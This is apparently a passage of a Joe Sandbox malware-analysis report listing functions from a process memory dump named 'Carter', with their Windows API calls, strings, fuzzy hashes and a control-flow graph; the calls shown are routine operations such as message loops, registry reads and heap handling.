                                                                        • API String ID: 1552873950-2806939583
                                                                        • Opcode ID: 48fe5a4aed0b8193e66c01b3e9ee607f4d8362ebf1d8fe6289e38dedeffbdbb8
                                                                        • Instruction ID: 7938b71f9bc4114f5dcc0788819efd588d9b129c75c650c761f1a1d37130e3e1
                                                                        • Opcode Fuzzy Hash: 48fe5a4aed0b8193e66c01b3e9ee607f4d8362ebf1d8fe6289e38dedeffbdbb8
                                                                        • Instruction Fuzzy Hash: 62512FB1D04219AFDF24DF64DC85AAEBBB9FF48304F0045AEB649A3250DB755A80CF58
                                                                        Function 0100563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1129 100563d-1005656 1130 1005673 1129->1130 1131 1005658-100565d 1129->1131 1132 1005675-100567b 1130->1132 1131->1130 1133 100565f-1005661 1131->1133 1134 1005663-1005668 call 1008d58 1133->1134 1135 100567c-1005681 1133->1135 1143 100566e call 1008fe6 1134->1143 1137 1005683-100568d 1135->1137 1138 100568f-1005693 1135->1138 1137->1138 1140 10056b3-10056c2 1137->1140 1141 10056a3-10056a5 1138->1141 1142 1005695-10056a0 call 1003010 1138->1142 1146 10056c4-10056c7 1140->1146 1147 10056c9 1140->1147 1141->1134 1145 10056a7-10056b1 1141->1145 1142->1141 1143->1130 1145->1134 1145->1140 1148 10056ce-10056d3 1146->1148 1147->1148 1151 10056d9-10056e0 1148->1151 1152 10057bc-10057bf 1148->1152 1153 1005721-1005723 1151->1153 1154 10056e2-10056ea 1151->1154 1152->1132 1156 1005725-1005727 1153->1156 1157 100578d-100578e call 1010dd7 1153->1157 1154->1153 1155 10056ec 1154->1155 1158 10056f2-10056f4 1155->1158 1159 10057ea 1155->1159 1160 1005729-1005731 1156->1160 1161 100574b-1005756 1156->1161 1170 1005793-1005797 1157->1170 1165 10056f6-10056f8 1158->1165 1166 10056fb-1005700 1158->1166 1167 10057ee-10057f7 1159->1167 1168 1005741-1005745 1160->1168 1169 1005733-100573f 1160->1169 1163 1005758 1161->1163 1164 100575a-100575d 1161->1164 1163->1164 1172 10057c4-10057c8 1164->1172 1173 100575f-100576b call 1004906 call 101108b 1164->1173 1165->1166 1166->1172 1174 1005706-100571f call 1010ef8 1166->1174 1167->1132 1171 1005747-1005749 1168->1171 1169->1171 1170->1167 1175 1005799-100579e 1170->1175 1171->1164 1177 10057da-10057e5 call 1008d58 1172->1177 1178 10057ca-10057d7 call 1003010 1172->1178 1190 1005770-1005775 1173->1190 1189 1005782-100578b 1174->1189 1175->1172 1176 10057a0-10057b1 1175->1176 1181 10057b4-10057b6 1176->1181 1177->1143 1178->1177 1181->1151 1181->1152 1189->1181 1191 100577b-100577e 1190->1191 1192 10057fc-1005800 1190->1192 1191->1159 1193 1005780 1191->1193 1192->1167 1193->1189
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 1559183368-0
                                                                        • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                        • Instruction ID: 318010d748bb477efabf498a131fcb8262f680a4bdb51a84911c8e722dfefe74
                                                                        • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                        • Instruction Fuzzy Hash: 1451C430A00306DBFB268F6DEC806AE7BF5BF14324F1487A9E9A9972D0D77099509F40
                                                                        Function 00FE52B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE52E6
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FE534A
                                                                        • TranslateMessage.USER32(?), ref: 00FE5356
                                                                        • DispatchMessageW.USER32(?), ref: 00FE5360
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchTranslate
                                                                        • String ID:
                                                                        • API String ID: 1795658109-0
                                                                        • Opcode ID: 8b332d1c0f98dc6edb4edaa92584e00a792023c152bdacd8bbb50f658258c15d
                                                                        • Instruction ID: 96252f13f36cb2402bdb9652cd4c8b1aa76d3029e6d344646ccd856f06716dcf
                                                                        • Opcode Fuzzy Hash: 8b332d1c0f98dc6edb4edaa92584e00a792023c152bdacd8bbb50f658258c15d
                                                                        • Instruction Fuzzy Hash: 44317C31900B869FEB30CAA5C848FBA37E9AB01B08F60405EF291931C9D7BFA445F711
                                                                        Function 00FE1284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00FE1275,SwapMouseButtons,00000004,?), ref: 00FE12A8
                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00FE1275,SwapMouseButtons,00000004,?), ref: 00FE12C9
                                                                        • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00FE1275,SwapMouseButtons,00000004,?), ref: 00FE12EB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: Control Panel\Mouse
                                                                        • API String ID: 3677997916-824357125
                                                                        • Opcode ID: 5344d66fcdab814dd11c5fd9e350dbceaeeebeecb34256f67efbc80fd88af55f
                                                                        • Instruction ID: 7b212a1164c2c6cef2294b1a2711410b8ce7427fa0589aa297d0be825064710c
                                                                        • Opcode Fuzzy Hash: 5344d66fcdab814dd11c5fd9e350dbceaeeebeecb34256f67efbc80fd88af55f
                                                                        • Instruction Fuzzy Hash: 6E115A71910248BFDB218FA6DC84EAFBBB8FF05750F004569F945E7104D2319E40A7A0
                                                                        Function 01043F1D Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesW.KERNEL32(?,01072C4C), ref: 01043F57
                                                                        • GetLastError.KERNEL32 ref: 01043F66
                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 01043F75
                                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,01072C4C), ref: 01043FD2
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 2267087916-0
                                                                        • Opcode ID: 8d76dcd4c696ffd1401283367ca6f63026540430758274096eb1d4724f980a6f
                                                                        • Instruction ID: 42dfa685bd8ad3716e94e02939ab5faa193e323f7afa828e066d5a6837a1f0dc
                                                                        • Opcode Fuzzy Hash: 8d76dcd4c696ffd1401283367ca6f63026540430758274096eb1d4724f980a6f
                                                                        • Instruction Fuzzy Hash: 1D21A3B05082119F8710DF68C8C18AEBBF4FE56364F105A6DF4D5DB2A2D731D946CB42
                                                                        Function 00FF5B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00FF5B58
                                                                          • Part of subcall function 00FF56F8: _memset.LIBCMT ref: 00FF5787
                                                                          • Part of subcall function 00FF56F8: _wcscpy.LIBCMT ref: 00FF57DB
                                                                          • Part of subcall function 00FF56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FF57EB
                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00FF5BAD
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00FF5BBC
                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 01030D7C
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1378193009-0
                                                                        • Opcode ID: ab3ed911dd7ebccf7f0d7d368c9da8ffb281d20eab236a7a727d75d5d57855da
                                                                        • Instruction ID: 23b115ff14c414cc64583881407c2ded83f6e3e98b2e60c5d90a9991bbaf8f0b
                                                                        • Opcode Fuzzy Hash: ab3ed911dd7ebccf7f0d7d368c9da8ffb281d20eab236a7a727d75d5d57855da
                                                                        • Instruction Fuzzy Hash: B22107B0905B889FE7729B248899BFEBBECAF41714F00008DF7DA56286C3752984DB41
                                                                        Function 00FF278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00FF27AF,?,00000001), ref: 00FF49F4
                                                                        • _free.LIBCMT ref: 0102FB04
                                                                        • _free.LIBCMT ref: 0102FB4B
                                                                          • Part of subcall function 00FF29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00FF2ADF
                                                                        Strings
                                                                        • Bad directive syntax error, xrefs: 0102FB33
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                                        • String ID: Bad directive syntax error
                                                                        • API String ID: 2861923089-2118420937
                                                                        • Opcode ID: a74aa60d45c75f249b1d6733a4cc756c1ca839f216c7190ac1a44d0d1bbdb2cf
                                                                        • Instruction ID: be5343d30ea5fdc04af5277cff9af30d94959f1694f5df4a82370a0b68498aeb
                                                                        • Opcode Fuzzy Hash: a74aa60d45c75f249b1d6733a4cc756c1ca839f216c7190ac1a44d0d1bbdb2cf
                                                                        • Instruction Fuzzy Hash: E791A271A1022EEFCF04EFA4CC909EEB7B4FF15340F00456AE995AB2A1DB349904DB50
                                                                        Function 01049CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00FF4AB2: __fread_nolock.LIBCMT ref: 00FF4AD0
                                                                        • _wcscmp.LIBCMT ref: 01049DE1
                                                                        • _wcscmp.LIBCMT ref: 01049DF4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscmp$__fread_nolock
                                                                        • String ID: FILE
                                                                        • API String ID: 4029003684-3121273764
                                                                        • Opcode ID: 4f09de93b295c31ee998381e383257276406a01dedc19a67ed34793a394cbefa
                                                                        • Instruction ID: f668006b30d7316506e8a8bf266c104b1b4a605d5f916af5644840bcb137dfc2
                                                                        • Opcode Fuzzy Hash: 4f09de93b295c31ee998381e383257276406a01dedc19a67ed34793a394cbefa
                                                                        • Instruction Fuzzy Hash: EB410671A4020ABBDF219EA5CC85FEF7BFDEF49714F00007AFA40A7194D679A9048B64
                                                                        Function 00FF31BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0103032B
                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 01030375
                                                                          • Part of subcall function 01000284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FF2A58,?,00008000), ref: 010002A4
                                                                          • Part of subcall function 010009C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 010009E4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                        • String ID: X
                                                                        • API String ID: 3777226403-3081909835
                                                                        • Opcode ID: 1a29f5e6c36c9b8e303150a40a7517b5f9410ff940cd1d632f90c11bed9ac02b
                                                                        • Instruction ID: 6ea2026723a778cf12174dbaf249ff303bedb326a6666def1b0c06554f1e5eac
                                                                        • Opcode Fuzzy Hash: 1a29f5e6c36c9b8e303150a40a7517b5f9410ff940cd1d632f90c11bed9ac02b
                                                                        • Instruction Fuzzy Hash: F821A171A0128C9BDF45DFD8C844BEE7BFCAF49300F00805AE544AB284DBB95988DFA1
                                                                        Function 0105D1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6a712077b08e77c31a42b7b6d74bc5b319ff1b6a0fdb7e18c610d4e6754d0899
                                                                        • Instruction ID: f49ecf8b5a75571554e19e418ea3d1c39a0a9b15a1be340adc69386b05f0f859
                                                                        • Opcode Fuzzy Hash: 6a712077b08e77c31a42b7b6d74bc5b319ff1b6a0fdb7e18c610d4e6754d0899
                                                                        • Instruction Fuzzy Hash: 8BF149706083419FC754DF68C880A6ABBE5FF88314F14896EF8999B351DB34E946CF92
                                                                        Function 00FEAAAA Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 010007BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 010007EC
                                                                          • Part of subcall function 010007BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 010007F4
                                                                          • Part of subcall function 010007BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 010007FF
                                                                          • Part of subcall function 010007BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 0100080A
                                                                          • Part of subcall function 010007BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 01000812
                                                                          • Part of subcall function 010007BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 0100081A
                                                                          • Part of subcall function 00FFFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00FEAC6B), ref: 00FFFFA7
                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FEAD08
                                                                        • OleInitialize.OLE32(00000000), ref: 00FEAD85
                                                                        • CloseHandle.KERNEL32(00000000), ref: 01022F56
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                        • String ID:
                                                                        • API String ID: 1986988660-0
                                                                        • Opcode ID: 25b8a7afd00439743c21e3b1b682de2ca4fae028fe52e075fdea0e67cfb78b65
                                                                        • Instruction ID: dbfa2e22617995492d028db15f8d2d06a6ed6e5920f142cad4d03084270d47e0
                                                                        • Opcode Fuzzy Hash: 25b8a7afd00439743c21e3b1b682de2ca4fae028fe52e075fdea0e67cfb78b65
                                                                        • Instruction Fuzzy Hash: 6E81CBB2A01A448FC3A8DF79E8416597FE4FB98304B80C26AD5D8C736AEB7B44058F55
                                                                        Function 00FF59D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00FF59F9
                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FF5A9E
                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00FF5ABB
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell_$_memset
                                                                        • String ID:
                                                                        • API String ID: 1505330794-0
                                                                        • Opcode ID: ba641f937bbb4f6b9247e479098d698d2f3ee9612fff098aa14ce091e2742408
                                                                        • Instruction ID: d2f870d043b50bb0700bae2c34eddea6741f461a8fbf1aa6001e695b50383b79
                                                                        • Opcode Fuzzy Hash: ba641f937bbb4f6b9247e479098d698d2f3ee9612fff098aa14ce091e2742408
                                                                        • Instruction Fuzzy Hash: 6F31B4B0905B058FC731DF24D4846ABBBE4FF49714F000A2EF7DA86250E77AA954DB52
                                                                        Function 0100593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __FF_MSGBANNER.LIBCMT ref: 01005953
                                                                          • Part of subcall function 0100A39B: __NMSG_WRITE.LIBCMT ref: 0100A3C2
                                                                          • Part of subcall function 0100A39B: __NMSG_WRITE.LIBCMT ref: 0100A3CC
                                                                        • __NMSG_WRITE.LIBCMT ref: 0100595A
                                                                          • Part of subcall function 0100A3F8: GetModuleFileNameW.KERNEL32(00000000,010A53BA,00000104,00000004,00000001,01001003), ref: 0100A48A
                                                                          • Part of subcall function 0100A3F8: ___crtMessageBoxW.LIBCMT ref: 0100A538
                                                                          • Part of subcall function 010032CF: ___crtCorExitProcess.LIBCMT ref: 010032D5
                                                                          • Part of subcall function 010032CF: ExitProcess.KERNEL32 ref: 010032DE
                                                                          • Part of subcall function 01008D58: __getptd_noexit.LIBCMT ref: 01008D58
                                                                        • RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,?,00000004,?,?,01001003,?), ref: 0100597F
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                        • String ID:
                                                                        • API String ID: 1372826849-0
                                                                        • Opcode ID: fdad44024b87ae9cbaf12a52340e531564d75c77b5c2b2a2e02791061237c8cd
                                                                        • Instruction ID: 3a548cd20595f1d8c02dfa1e8d83b110ec3b75733da4359905674b274cb98386
                                                                        • Opcode Fuzzy Hash: fdad44024b87ae9cbaf12a52340e531564d75c77b5c2b2a2e02791061237c8cd
                                                                        • Instruction Fuzzy Hash: C701B132745B079EF6633B68AC40AAE3398AF63670F500577E5D5AF1D0DEB588008FA1
                                                                        Function 010492C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _free.LIBCMT ref: 010492D6
                                                                          • Part of subcall function 01002F85: RtlFreeHeap.NTDLL(00000000,00000000,?,01009C54,00000000,01008D5D,010059C3), ref: 01002F99
                                                                          • Part of subcall function 01002F85: GetLastError.KERNEL32(00000000,?,01009C54,00000000,01008D5D,010059C3), ref: 01002FAB
                                                                        • _free.LIBCMT ref: 010492E7
                                                                        • _free.LIBCMT ref: 010492F9
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                        • Instruction ID: deba26105f1712cd8d3b70e8b05ed447b55f4f3e1674279e82f742e3dde271f0
                                                                        • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                        • Instruction Fuzzy Hash: 45E0C2E120460343EA20A53C6A84EE37BEC0F8C291B54057DB589D3181CE20E4408028
                                                                        Function 00FE5E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
